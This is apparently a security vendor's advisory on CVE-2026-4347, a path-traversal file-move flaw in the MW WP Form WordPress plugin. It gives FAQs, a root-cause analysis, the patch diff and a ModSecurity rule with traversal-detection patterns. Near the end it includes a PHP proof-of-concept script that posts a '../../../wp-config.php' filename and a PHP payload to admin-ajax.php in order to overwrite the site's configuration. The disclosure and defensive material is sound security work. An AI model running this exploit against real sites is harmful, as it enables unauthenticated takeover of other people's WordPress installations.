What is CVE-2026-4347?

CVE-2026-4347 is a high-severity vulnerability in the MW WP Form plugin for WordPress, affecting versions up to and including 5.1.0. It allows unauthenticated attackers to move arbitrary files on the server due to insufficient file path validation, which can lead to remote code execution.

How does this vulnerability work?

The vulnerability arises from the ‘generate_user_filepath’ and ‘move_temp_file_to_upload_dir’ functions, which do not properly validate user-supplied file paths. Attackers can exploit this by submitting a crafted request to move files to sensitive locations, such as overwriting ‘wp-config.php’.

Who is affected by this vulnerability?

Any WordPress site using the MW WP Form plugin version 5.1.0 or earlier is at risk. Administrators should check their plugin version and ensure that the ‘Saving inquiry data in database’ option is not enabled if using a vulnerable version.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the MW WP Form plugin installed on your WordPress site. If it is version 5.1.0 or earlier, and if the form includes a file upload field with data saving enabled, your site is vulnerable.

How can I fix this vulnerability?

To mitigate this vulnerability, update the MW WP Form plugin to version 5.1.1 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice for maintaining site security.

What if I cannot update the plugin immediately?

If immediate updates are not possible, disable the file upload field in forms using the MW WP Form plugin and ensure that the ‘Saving inquiry data in database’ option is turned off. This will reduce the risk of exploitation until the plugin can be updated.

What does a CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity vulnerability, suggesting that it poses a significant risk to systems. It implies that successful exploitation can lead to serious consequences, such as remote code execution and full control over the affected WordPress site.

What are the practical risks of this vulnerability?

The practical risks include unauthorized file manipulation, remote code execution, data loss, and potential site defacement. An attacker could overwrite critical files, leading to complete compromise of the WordPress installation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a request to the vulnerable AJAX endpoint, using a path traversal payload in the ‘filename’ parameter. This demonstrates the ability to move a file to a sensitive location, such as overwriting ‘wp-config.php’, thus highlighting the vulnerability’s severity.

What steps should I take after patching?

After updating the plugin, review your site’s security posture. Conduct a security audit, check for any unauthorized changes, and ensure that all other plugins and themes are also up to date. Regular backups and security monitoring are recommended.

Is this vulnerability specific to certain configurations?

Yes, the vulnerability is only exploitable if a file upload field is present in the form and the ‘Saving inquiry data in database’ option is enabled. Sites without these configurations are not at risk from this specific vulnerability.

What is the role of the 'generate_user_filepath' function?

The ‘generate_user_filepath’ function is responsible for constructing file paths based on user input. Its lack of proper validation allows attackers to manipulate file paths, leading to the arbitrary file move vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-4347: MW WP Form <= 5.1.0 – Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir (mw-wp-form)

CVE ID CVE-2026-4347

Plugin mw-wp-form

Severity High (CVSS 8.1)

CWE 22

Vulnerable Version 5.1.0

Patched Version 5.1.1

Disclosed March 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4347:
The MW WP Form plugin for WordPress versions up to and including 5.1.0 contains an unauthenticated arbitrary file move vulnerability. This flaw exists in the file handling mechanism when a form with a file upload field is configured with the ‘Saving inquiry data in database’ option enabled. Attackers can exploit this to move arbitrary files on the server, potentially leading to remote code execution.

Atomic Edge research identifies the root cause in the `generate_user_filepath` function within `/mw-wp-form/classes/models/class.directory.php`. The vulnerable code constructs a file path by joining a user-controlled `$filename` parameter with a base directory using `path_join`. Prior to the patch, the function performed insufficient validation on the `$filename` parameter. It only checked for directory traversal sequences (`../`) after constructing the full path, which could be bypassed. The `move_temp_file_to_upload_dir` function then uses this insecure path generation to move files.

The exploitation method involves an unauthenticated attacker submitting a crafted request to the plugin’s file upload handler. The attacker supplies a `filename` parameter containing a path traversal payload targeting a sensitive file, such as `../../../wp-config.php`. When the plugin processes the upload, it moves the temporary uploaded file to the attacker-specified location, overwriting the target file. This attack requires the form to have a file upload field and for data saving to be enabled, which triggers the vulnerable `move_temp_file_to_upload_dir` function.

The patch in version 5.1.1 adds multiple layers of validation. It normalizes the `$filename` using `wp_normalize_path`. The patch then verifies that the normalized filename equals its basename, ensuring no directory components are present. It also checks for null bytes. Crucially, the patch normalizes the final `$filepath` and the `$user_file_dir`, then uses `strpos` to confirm the final path remains within the intended directory. This path containment check, performed before the traversal sequence check, prevents directory escape regardless of input encoding or separators.

Successful exploitation allows an attacker to move and overwrite arbitrary files on the web server. The primary impact is remote code execution, achieved by moving a malicious file to replace a critical PHP file like `wp-config.php` or a theme/plugin file. This grants the attacker full control of the WordPress site. The vulnerability can also lead to data loss, site defacement, or denial of service by overwriting essential configuration or system files.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/mw-wp-form/classes/functions.php
+++ b/mw-wp-form/classes/functions.php
@@ -43,11 +43,11 @@
 	/**
 	 * Unify line feed code to n.
 	 *
-	 * @param sring $string String.
+	 * @param string|null $string String.
 	 * @return string
 	 */
 	public static function convert_eol( $string ) {
-		return preg_replace( "/rn|r|n/", "n", $string );
+		return is_string( $string ) ? preg_replace( "/rn|r|n/", "n", $string ) : '';
 	}

 	/**
--- a/mw-wp-form/classes/models/class.akismet.php
+++ b/mw-wp-form/classes/models/class.akismet.php
@@ -107,7 +107,7 @@
 			$akismet[ $key ] = $value;
 		}

-		$query_string = http_build_query( $akismet, null, '&' );
+		$query_string = http_build_query( $akismet, '', '&' );
 		if ( is_callable( array( 'Akismet', 'http_post' ) ) ) {
 			$response = Akismet::http_post( $query_string, 'comment-check' );
 		} else {
--- a/mw-wp-form/classes/models/class.directory.php
+++ b/mw-wp-form/classes/models/class.directory.php
@@ -145,7 +145,21 @@
 			return false;
 		}

-		$filepath = path_join( $user_file_dir, $filename );
+		$normalized_filename = wp_normalize_path( $filename );
+		if (
+			wp_basename( $normalized_filename ) !== $normalized_filename ||
+			strstr( $normalized_filename, "" )
+		) {
+			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
+		}
+
+		$filepath      = path_join( $user_file_dir, $filename );
+		$filepath      = wp_normalize_path( $filepath );
+		$user_file_dir = trailingslashit( wp_normalize_path( $user_file_dir ) );
+
+		if ( 0 !== strpos( $filepath, $user_file_dir ) ) {
+			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
+		}

 		if ( str_contains( $filepath, '../' ) || str_contains( $filepath, '..' . DIRECTORY_SEPARATOR ) ) {
 			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
--- a/mw-wp-form/classes/services/class.redirected.php
+++ b/mw-wp-form/classes/services/class.redirected.php
@@ -171,7 +171,7 @@
 		}

 		if ( ! empty( $query_string ) ) {
-			return $url . '?' . http_build_query( $query_string, null, '&', PHP_QUERY_RFC3986 );
+			return $url . '?' . http_build_query( $query_string, '', '&', PHP_QUERY_RFC3986 );
 		}

 		return $url;
--- a/mw-wp-form/mw-wp-form.php
+++ b/mw-wp-form/mw-wp-form.php
@@ -3,8 +3,9 @@
  * Plugin Name: MW WP Form
  * Plugin URI: https://mw-wp-form.web-soudan.co.jp
  * Description: MW WP Form is shortcode base contact form plugin. This plugin have many features. For example you can use many validation rules, inquiry data saving, and chart aggregation using saved inquiry data.
- * Version: 5.1.0
+ * Version: 5.1.1
  * Requires at least: 6.0
+ * Requires PHP: 8.0
  * Author: websoudan
  * Author URI: https://web-soudan.co.jp/
  * Original Author: inc2734

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4347
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10004347,phase:2,deny,status:403,chain,msg:'CVE-2026-4347 - MW WP Form Arbitrary File Move via AJAX',severity:'CRITICAL',tag:'CVE-2026-4347',tag:'MW-WP-Form',tag:'Path-Traversal'"
  SecRule ARGS_POST:action "@rx ^mwf_(upload_file|.*submit)$" "chain"
    SecRule ARGS_POST:filename "@rx (?i)(?:^|\|/|%2f|%5c|..|%u002e%u002e)(?:..|%u002e%u002e)(?:\|/|%2f|%5c)" 
      "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4347 - MW WP Form <= 5.1.0 - Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// The form must have a file upload field and data saving enabled.
// This PoC targets the AJAX endpoint that handles form submissions.
// The 'action' parameter must match the specific form's AJAX hook.
// The 'filename' parameter is user-controlled and vulnerable to path traversal.

$post_fields = [
    'action' => 'mwf_upload_file', // Example AJAX action; may vary per form configuration
    'filename' => '../../../wp-config.php', // Path traversal to target WordPress config
    // Other required form fields would be included here
];

// A temporary file payload to write. This could be malicious PHP code.
$malicious_content = '<?php phpinfo(); ?>';
$tmp_file = tempnam(sys_get_temp_dir(), 'mwf');
file_put_contents($tmp_file, $malicious_content);

$file_field = [
    'uploaded_file' => new CURLFile($tmp_file, 'application/octet-stream', 'payload.txt')
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_fields, $file_field));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

unlink($tmp_file);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

// If successful, the server's wp-config.php may be overwritten with our payload.
// Verify by accessing http://vulnerable-site.com/wp-config.php?test=1
?>

Frequently Asked Questions

What is CVE-2026-4347?
Understanding the vulnerability
CVE-2026-4347 is a high-severity vulnerability in the MW WP Form plugin for WordPress, affecting versions up to and including 5.1.0. It allows unauthenticated attackers to move arbitrary files on the server due to insufficient file path validation, which can lead to remote code execution.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the ‘generate_user_filepath’ and ‘move_temp_file_to_upload_dir’ functions, which do not properly validate user-supplied file paths. Attackers can exploit this by submitting a crafted request to move files to sensitive locations, such as overwriting ‘wp-config.php’.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the MW WP Form plugin version 5.1.0 or earlier is at risk. Administrators should check their plugin version and ensure that the ‘Saving inquiry data in database’ option is not enabled if using a vulnerable version.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the MW WP Form plugin installed on your WordPress site. If it is version 5.1.0 or earlier, and if the form includes a file upload field with data saving enabled, your site is vulnerable.
How can I fix this vulnerability?
Applying the patch
To mitigate this vulnerability, update the MW WP Form plugin to version 5.1.1 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice for maintaining site security.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, disable the file upload field in forms using the MW WP Form plugin and ensure that the ‘Saving inquiry data in database’ option is turned off. This will reduce the risk of exploitation until the plugin can be updated.
What does a CVSS score of 8.1 indicate?
Understanding severity levels
A CVSS score of 8.1 indicates a high severity vulnerability, suggesting that it poses a significant risk to systems. It implies that successful exploitation can lead to serious consequences, such as remote code execution and full control over the affected WordPress site.
What are the practical risks of this vulnerability?
Potential impacts on your site
The practical risks include unauthorized file manipulation, remote code execution, data loss, and potential site defacement. An attacker could overwrite critical files, leading to complete compromise of the WordPress installation.
How does the proof of concept demonstrate the vulnerability?
Exploit mechanics explained
The proof of concept shows how an attacker can craft a request to the vulnerable AJAX endpoint, using a path traversal payload in the ‘filename’ parameter. This demonstrates the ability to move a file to a sensitive location, such as overwriting ‘wp-config.php’, thus highlighting the vulnerability’s severity.
What steps should I take after patching?
Post-update best practices
After updating the plugin, review your site’s security posture. Conduct a security audit, check for any unauthorized changes, and ensure that all other plugins and themes are also up to date. Regular backups and security monitoring are recommended.
Is this vulnerability specific to certain configurations?
Conditions for exploitation
Yes, the vulnerability is only exploitable if a file upload field is present in the form and the ‘Saving inquiry data in database’ option is enabled. Sites without these configurations are not at risk from this specific vulnerability.
What is the role of the 'generate_user_filepath' function?
Functionality and vulnerabilities
The ‘generate_user_filepath’ function is responsible for constructing file paths based on user input. Its lack of proper validation allows attackers to manipulate file paths, leading to the arbitrary file move vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations